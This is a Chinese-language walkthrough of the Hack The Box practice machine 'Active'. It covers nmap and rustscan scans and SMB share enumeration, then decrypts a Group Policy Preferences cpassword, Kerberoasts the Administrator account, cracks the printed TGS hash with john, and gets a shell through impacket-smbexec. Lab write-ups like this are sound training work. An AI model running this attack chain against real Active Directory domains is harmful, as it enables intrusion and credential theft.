目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用smbmap枚举靶机SMB服务共享

继续使用smbmap对Replication共享进行递归枚举

边界突破

使用gpp-decrypt解密上述Cpassword密码

使用netexec通过上述凭证可枚举靶机域内用户

使用impacket-GetUserSPNs提取靶机域内SPN关连账户

使用john通过字典爆破该TGS票据

使用impacket-smbexec通过上述凭证登录靶机

---

连接至HTB服务器并启动靶机

分配IP：10.10.16.22

靶机IP：10.10.10.100

靶机Domain：active.htb

---

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a active.htb -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存

ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167
                                                                                                                               
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)                              
                                                                                                                               
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports                                                                      
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn active.htb

• 需要重点关注的服务和信息

53端口：Domain服务

88端口：Kerberos服务

389端口：LDAP服务

445端口：SMB服务

Domain：active.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

nmap -sT -p$ports --script=vuln -O -Pn active.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn active.htb

使用nmap对靶机UDP开放端口进行脚本、服务扫描

nmap -sU -p53,123 -sCV -Pn active.htb

使用smbmap枚举靶机SMB服务共享

smbmap -H active.htb

继续使用smbmap对Replication共享进行递归枚举

smbmap -H active.htb -r Replication --depth 10

• 将Groups.xml文件下载到攻击机本地

smbmap -H active.htb -r Replication --depth 10 --download Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

• 查看该文件内容

cat 10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

• 审计该文件内容

Name：active.htb\SVC_TGS

Cpassword：edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

• 由于该文件所在路径存在字样：Policies(策略)、Groups(组)，因此我首先考虑Windows组策略加密

---

边界突破

使用gpp-decrypt解密上述Cpassword密码

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

• 由此获得完整凭证

账户：SVC_TGS

密码：GPPstillStandingStrong2k18

使用netexec通过上述凭证可枚举靶机域内用户

netexec smb active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users

• 由此证明该凭证可用

使用impacket-GetUserSPNs提取靶机域内SPN关连账户

• 首先使用ntpdate与靶机域控制器时间同步

ntpdate active.htb

• 使用impacket-GetUserSPNs直接请求与SPN关联账户TGS票据

• 将该TGS票据内容存入文件

echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5eb2a4781b6945ef9ab744f712190930$f2cc7458fb68d043eefabd6db760f9639839d111c712d9ffe4b7e0b011c314865c7ae68a43de4ec7c84da9969594a231188f90cf14410e7a76b2f1c34c738f099de87d233dc9feb21b8bb21b851e3c1cc9496c042a6cf4723ee4c3b3cd5e66ca36cfe89a526bbd9a6cfe94b0860d68c9314520a24d52a4eacecca3d6cd98e11bd4fb0a0a09ec309b9318f931077d5c5a80a4446b4ae005bb902d478737655e0689038db6cdd9920d65e1fd40713ba122701ca2542bf926a28f8e603e1a09690f7de76e0e8323363a16601ccf3babb94cc93ed375dec3c33c2c0fefa5832b886e6a65318b605d7f77e3945382928cf28e7622e5b128528d8332cfc78afe10b1350d93b02e48b31bfbd0cad6d4c2c0a8174eaeb5b9512dbf29b35a2eb7c335da6be6344816d4963aa0c86f70e61af664166b711cd24cf98ad92c89d39f04a7c1aa875d5f6eb551d63f30ec613d68be3a7e1fb037633ad4c60389c9e334970117c0370ce4aa3b7e0fa550b478c65e6805e21101991daa20c2e2b3f6cf8e8e631c5deb02f4d7f6f075ab326a82674f1877207d6ced05463aea1e4b1504673dddb0704a3e67de3fc25238034fd3127252f7e70f3391703a52f967df72608349b5927ff5f6e62267a5e5fd34a28c0f5f5b59576b32748be857317ed93c909c10459c1d0d74b67301516a6a4f393ed7f22fa89041eba38c438d50b064c1dfec8c1323b2af3390f3169c9e6a9fa1d9dad275f95993f6cac99208e9235cf288dc302cdab0d8f925d84cdc16cc57fefb75a91fa305961ef809ff1f240408da6f1d3a871d296235a1e95629d74c071211ed9a3d8a99d3feb82bea214f5ad245ec48aabb11737b9e24ac32549af8ea5c4bf200fecc838dd4e4adf0e4cf38e16b858eb9b9745edc94693c2c7a7ac4f55634bcdf1a56bb9cdb0179e50768b0e1a4efd4c62b7f0331145a64a7666abc3e165f41d5111856a0e9722d07bc85ab14d3e135bf3d22a49eb73103cdff6f630994ff858319fb4836d076bc07a37beedac6714923504ebd0c15382a3e3f281c37a8793e52ebd0133273b0c5ca99f330d377eb336c384d9ce80072c81ec16920af62cbd0bd9c573071287e6e273a21fe684df9e59775c8d20df37fd2aec038a3d8a7b609f96a66f612f19db51949b4db500b6cbbfc7651583c2e6503e806d1e2e611deee2c493f12edb281241758353601951e2a22f2d34eaed8918e126b8420528398894333f8ef074c8f35b495c2160b6c' > hash

使用john通过字典爆破该TGS票据

john hash --wordlist=../dictionary/rockyou.txt --format=krb5tgs

账户：Administrator

密码：Ticketmaster1968

使用impacket-smbexec通过上述凭证登录靶机

impacket-smbexec active.htb/Administrator:Ticketmaster1968@active.htb